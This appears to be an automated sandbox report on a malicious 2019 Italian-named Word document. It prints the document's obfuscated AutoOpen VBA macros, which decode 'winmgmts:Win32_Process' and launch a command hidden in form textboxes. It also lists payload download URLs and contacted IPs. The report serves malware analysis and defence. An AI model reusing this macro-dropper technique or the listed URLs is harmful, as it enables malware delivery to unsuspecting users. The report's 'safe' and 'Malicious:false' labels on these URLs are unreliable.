                Preview:...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1.....lF.R. PROGRA~2..D.......:..lF.R*.........................P.r.o.g.r.a.m.D.a.t.a.....X.1......H]:. MICROS~1..@.......:...H]:*.........................M.i.c.r.o.s.o.f.t.....R.1.....M>O@. Windows.<.......:..M>O@*...(.....................W.i.n.d.o.w.s.......1.....~F\O..STARTM~1..j.......:..~F\O*...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......I.k..Programs..f.......:...I.k*...3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......I.h..ACCESS~1..l.......:..M>Z@*...4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%*...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&*....)....................W.i.n.d.o.w.s.
                C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.206542077975962
                Encrypted:false
                MD5:D00AF25948EE6C7F7AB78C2C16AACD3B
                SHA1:A02DBBFB4A5627CA061BD0608815F6288263C282
                SHA-256:63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
                SHA-512:BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
                Malicious:false
                Preview:.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.

                Domains and IPs

                Contacted Domains

                Name:sabiosdelamor.co
                IP:198.49.65.242
                Active:true
                Malicious:false
                Antivirus Detection:
                Reputation:unknown

                URLs from Memory and Binaries

                Name:http://181.164.8.25/attrib/schema/pdf/merge/sortedwatched.exe
                Source:0000000C.00000002.559572605.00224000.00000004.00000020.sdmp
                Malicious:false
                Antivirus Detection:Avira URL Cloud: safe
                Reputation:unknown
                Name:http://181.164.8.25/attrib/schema/pdf/merge/nsortedwatched.exe
                Source:0000000C.00000002.559572605.00224000.00000004.00000020.sdmp
                Malicious:false
                Antivirus Detection:Avira URL Cloud: safe
                Reputation:unknown

                Contacted IPs


                Public

                IP:149.167.86.174
                Country:Australia
                ASN:45510
                ASN Name:unknown
                Malicious:false
                IP:198.49.65.242
                Country:United States
                ASN:33182
                ASN Name:unknown
                Malicious:false
                IP:181.164.8.25
                Country:Argentina
                ASN:10318
                ASN Name:unknown
                Malicious:false

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Joseph Fritsch, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 20 08:30:00 2019, Last Saved Time/Date: Fri Sep 20 08:30:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
                Entropy (8bit):6.7270076216244306
                TrID:
                • Microsoft Word document (32009/1) 52.89%
                • Microsoft Word document (old ver.) (19008/1) 31.41%
                • Generic OLE2 / Multistream Compound File (8008/1) 13.23%
                • Java Script embedded in Visual Basic Script (1500/0) 2.48%
                File name:Nuovo_documento_2019.09.20.doc
                File size:236544
                MD5:1b9714114ff735277c8981c84d4f2393
                SHA1:beacaf09fb062e5f3e986ee294ed5ec97fc26c12
                SHA256:beb82d8b2429911fffe39457bd4bb8bbe033ca34826df10b291fa74b33c7275a
                SHA512:49f4a4e8de51483e8f5500e42be792bec9e26d5e583d88011d9dc732a5a504adb4ac34cccf2d3382b802d871acf038063cc850031c2ae910b55413d2a2358070
                SSDEEP:6144:+d96T4Rci2R9JtXvIj++PWVI1dGLkIV7NSU4jJntATfDDBpp:+d96T4Rci2R9JtXvH+PWVI1SXV7NSU4+

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Nuovo_documento_2019.09.20.doc"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Office Word
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:True
                Flash Objects Count:0
                Contains VBA Macros:True

                Summary

                Code Page:1252
                Title:
                Subject:
                Author:Joseph Fritsch
                Keywords:
                Comments:
                Template:Normal.dotm
                Last Saved By:
                Revision Number:1
                Total Edit Time:0
                Create Time:2019-09-20 07:30:00
                Last Saved Time:2019-09-20 07:30:00
                Number of Pages:1
                Number of Words:95
                Number of Characters:547
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Document Code Page:1252
                Number of Lines:4
                Number of Paragraphs:1
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: JIodCjfv.bas, Stream Size: 5179
                General
                Stream Path:Macros/VBA/JIodCjfv
                VBA File Name:JIodCjfv.bas
                Stream Size:5179

                VBA Code Keywords

                Keyword
                CDate(uDNHZRDB)
                Fix(fIDOjLzQ)
                Until
                EnzDZGz
                Resume
                CStr(rbJdmEz))
                whapPJb
                FnLI_N
                OuoioTjO
                qcOQjrD
                CStr(ruLzmW))
                CStr(uJwlJz))
                YGuUZX
                RecentFiles.Count
                CDHkaIfU
                (ATaMOL
                Sin(WrztcmHX)
                (HZGOlw
                MLzjlI
                DtWubh
                jQhhhQSc
                uNL_Qm
                CStr(NWWiIQQi))
                EhPXLwZr
                zaBTww
                Sin(dOmmAiqP)
                oSsOXl
                FIHNkM
                CStr(bQrbmIrJ)
                ZfdJRPiY
                FJHJlhv
                CDate(OkzDrVT)
                Fix(mwv_hRR)
                Error
                sRRzpU
                dYFvGWI
                mzTRZThP
                oihAvpA
                Attribute
                autoopen()
                DkkCTnu
                oPMvTw
                VB_Name
                "JIodCjfv"
                Function
                Iofqhj
                OObwzR
                cCsukAJS
                wqLToroz
                FnZwmD_A
                CKCNjv
                qNXwDA
                rkbEFdX
                FXnzwzC
                sNGNZi
                AuOCYR
                hUPJJL
                YcqUOCsQ
                kULEiwf
                VBA Code
                Attribute VB_Name = "JIodCjfv"
                Sub autoopen()
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If wqLToroz = Na5naWHG Then
                         PhaBus1_ = Tan(1141)
                      End If
                         qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW))
                      For Each oSsOXl In NAJ70I4
                         OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd)
                      Next
                Loop Until fXaz2u = D5Yzqc
                If RecentFiles.Count > 3 Then
                dztj37
                End If
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If whapPJb = ow8oQWti Then
                         cc6fSzI = Tan(1141)
                      End If
                         nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c))
                      For Each sRRzpU In i2w7lPf
                         QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP)
                      Next
                Loop Until Fi6Vjz = XZJ7qqlh
                End Sub
                Function R3tnEz2D()
                ZfdJRPiY = kULEiwf + DAbbE9mG
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If f1ocqu = wZfG2P Then
                         EE3NY5nB = Tan(1141)
                      End If
                         jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz))
                      For Each BpzwCL7 In ZwwF3I
                         oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX)
                      Next
                Loop Until N06UkOi = sNGNZi
                Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc)
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If ZD4NzNKp = dYFvGWI Then
                         FIHNkM = Tan(1141)
                      End If
                         Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz))
                      For Each TCu6kpE7 In Pt5_Krw
                         FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz)
                      Next
                Loop Until DHQs26 = CKCNjv
                R3tnEz2D.ShowWindow! = ZfdJRPiY
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If hUPJJL = oihAvpA Then
                         CCj5oD = Tan(1141)
                      End If
                         YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o))
                      For Each SFnP24Y In rkbEFdX
                         wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm)
                      Next
                Loop Until FnZwmD_A = KUA7zY
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If ls9iOFd = EnzDZGz Then
                         iYU6MXV = Tan(1141)
                      End If
                         JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi))
                      For Each FWa6lK In S10zzpNS
                         FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw)
                      Next
                Loop Until hfW56jn = FJHJlhv
                End Function
                VBA File Name: ThisDocument.cls, Stream Size: 3527
                General
                Stream Path:Macros/VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:3527

                VBA Code Keywords

                Keyword
                "FikbdQZ,
                VB_Name
                VB_Creatable
                "hjjzVw,
                VB_Exposed
                TextBox"
                "uXSvzY,
                VB_Customizable
                "ThisDocument"
                VB_Control
                VB_TemplateDerived
                MSForms,
                False
                "GoWsRhk,
                Attribute
                "zJWspwz,
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                "cZDuVz,
                "qijkYG,
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"
                Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"
                Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"
                Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"
                Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"
                Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"
                Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"
                Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"
                Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"
                Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"
                Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"
                Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"
                Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"
                Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"
                Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"
                Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"
                Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"
                Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"
                Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"
                Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"
                VBA File Name: snLF1V.bas, Stream Size: 5388
                General
                Stream Path:Macros/VBA/snLF1V
                VBA File Name:snLF1V.bas
                Stream Size:5388

                VBA Code Keywords

                Keyword
                XzsVHACu
                aGJjAH
                Until
                Resume
                mWYlNTFO
                wDZDIUTV
                MAPHFj
                tcDLLb
                YAHvQ_
                Sin(CmXBWjb)
                YjRQrq
                zQkMRi
                UMvDUH(jNQUnno)
                ZNRIEN
                UMvDUH
                Fix(FRqJIU)
                huhEoJG
                EqHGmqzs
                CDate(fCMUHn)
                WiwqHbr
                CStr(GdQwslU)
                JSjBjs
                zcazMGDf
                MSfBRT
                ojvDCQi
                WLAEkzsu
                Sin(cISYkJs)
                wMBYtY
                nkfcdqD
                HnhIwa
                (pSZQnNn
                Replace(jNQUnno,
                UPMZSQ
                HpAvVal
                Sin(mjjrHIf)
                Error
                Attribute
                HV_KNz
                jMCQik
                dpjKqtAS
                VB_Name
                tqXjFCw
                PFAGKSc
                CStr(FfJUME)
                Function
                m_MLhXX
                rZcdZKRX
                busmGEX
                wWOoNnTo
                diSWXniz
                CDate(lsaWRUr)
                UMvDUH(ThisDocument.zJWspwz
                pUBdAcb
                cLEAWn
                CStr(uBRAVT))
                CStr(wlzHbq))
                Fix(jYQWvaN)
                ZKnIZEfd,
                VBA Code
                Attribute VB_Name = "snLF1V"
                Function dztj37()
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If M3oCwG = PFAGKSc Then
                         HnhIwa = Tan(1141)
                      End If
                         R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))
                      For Each jMCQik In tkw6vj
                         CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)
                      Next
                Loop Until PcG7it_ = zir7hM
                kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If LXv84MXp = JSjBjs Then
                         rZcdZKRX = Tan(1141)
                      End If
                         wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))
                      For Each fVn1T1_ In BnCM82w
                         zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)
                      Next
                Loop Until lnY3HW = jXUw9Oz
                
                CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If wWOoNnTo = MSfBRT Then
                         QvB9VD = Tan(1141)
                      End If
                         z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))
                      For Each mjHV7os In LDjJ6zM
                         XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)
                      Next
                Loop Until X975_m = zcazMGDf
                
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If Pu1R8IUO = aXF2_4qQ Then
                         EaYS6RQw = Tan(1141)
                      End If
                         nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))
                      For Each mWYlNTFO In HpAvVal
                         iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)
                      Next
                Loop Until Sff8wzaz = B8wUj_W
                End Function
                Function UMvDUH(jNQUnno)
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If CP2pOzYD = m_MLhXX Then
                         UPMZSQ = Tan(1141)
                      End If
                         busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))
                      For Each d_7JYztz In nP1obkp
                         HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)
                      Next
                Loop Until Xb5lam = diSWXniz
                UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")
                   On Error Resume Next
                   Set mna = xqmm6672
                   Do
                      If wMBYtY = O_vT8j Then
                         mEczi1 = Tan(1141)
                      End If
                         ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))
                      For Each HV_KNz In t3Fh05z
                         w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)
                      Next
                Loop Until qaB0m7mo = E9cRqzhV
                End Function

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:114
                Entropy:4.2359563651
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:280
                Entropy:2.41598942003
                Base64 Encoded:False
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 416
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:416
                Entropy:3.20037592743
                Base64 Encoded:False
                Stream Path: 1Table, File Type: data, Stream Size: 8131
                General
                Stream Path:1Table
                File Type:data
                Stream Size:8131
                Entropy:5.68194048366
                Base64 Encoded:True
                Stream Path: Data, File Type: data, Stream Size: 148800
                General
                Stream Path:Data
                File Type:data
                Stream Size:148800
                Entropy:7.4746505717
                Base64 Encoded:True
                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 589
                General
                Stream Path:Macros/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:589
                Entropy:5.38649124242
                Base64 Encoded:True
                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 89
                General
                Stream Path:Macros/PROJECTwm
                File Type:data
                Stream Size:89
                Entropy:3.59090450368
                Base64 Encoded:False
                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 16910
                General
                Stream Path:Macros/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:16910
                Entropy:5.54553098729
                Base64 Encoded:True
                Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2114
                General
                Stream Path:Macros/VBA/__SRP_0
                File Type:data
                Stream Size:2114
                Entropy:4.65721405944
                Base64 Encoded:False
                Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 507
                General
                Stream Path:Macros/VBA/__SRP_1
                File Type:data
                Stream Size:507
                Entropy:4.07674775518
                Base64 Encoded:False
                Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 2956
                General
                Stream Path:Macros/VBA/__SRP_2
                File Type:data
                Stream Size:2956
                Entropy:2.53035163856
                Base64 Encoded:False
                Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 846
                General
                Stream Path:Macros/VBA/__SRP_3
                File Type:data
                Stream Size:846
                Entropy:3.09934303505
                Base64 Encoded:False
                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 901
                General
                Stream Path:Macros/VBA/dir
                File Type:data
                Stream Size:901
                Entropy:6.47934500425
                Base64 Encoded:True
                Stream Path: ObjectPool/_1630480601/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480601/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480601/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480601/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480601/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480601/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480601/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480601/contents
                File Type:data
                Stream Size:64
                Entropy:3.55239648336
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480602/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480602/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480602/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480602/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480602/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480602/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480602/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480602/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480603/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480603/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480603/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480603/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480603/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480603/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480603/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480603/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480604/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480604/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480604/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480604/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480604/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480604/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480604/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480604/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480605/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480605/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480605/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480605/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480605/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480605/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480605/contents, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480605/contents
                File Type:data
                Stream Size:116
                Entropy:4.39351761296
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480606/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480606/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480606/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480606/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480606/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480606/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480606/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480606/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480607/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480607/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480607/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480607/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480607/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480607/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480607/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480607/contents
                File Type:data
                Stream Size:64
                Entropy:3.53294160058
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480608/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480608/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480608/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480608/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480608/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480608/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480608/contents, File Type: data, Stream Size: 4420
                General
                Stream Path:ObjectPool/_1630480608/contents
                File Type:data
                Stream Size:4420
                Entropy:3.95961733751
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480609/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480609/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480609/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480609/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Stream Path: ObjectPool/_1630480609/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480609/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                General
                Stream Path:ObjectPool/_1630480609/contents
                File Type:data
                Stream Size:64
                Entropy:3.55239648336
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . w r u p V o i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                General
                Stream Path:ObjectPool/_1630480610/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
